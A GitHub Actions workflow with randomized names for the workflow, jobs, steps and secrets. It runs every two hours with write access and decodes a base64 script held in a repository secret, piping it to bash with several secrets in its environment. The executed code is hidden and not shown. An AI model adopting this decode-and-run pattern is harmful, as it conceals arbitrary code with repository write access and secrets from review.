name: KXKJ6yT7TbmAZq
on:
  schedule:
    - cron: '0 */2 * * *'
  workflow_dispatch:
jobs:
  j1PEEfg5:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4
        with:
          token: ${{ secrets.NKY3tUKf }}
      - name: xfpwbdQKkR9i
        env:
          S5PcU1: ${{ secrets.U5FlHcPhNksx }}
          DcwMhOILBawe: ${{ secrets.afzlJwPmP5cXNwYS }}
          mLYiQFDCs: ${{ secrets.JPREYrA }}
          GITHUB_TOKEN: ${{ secrets.NKY3tUKf }}
        run: echo "$S5PcU1" | base64 -d | bash
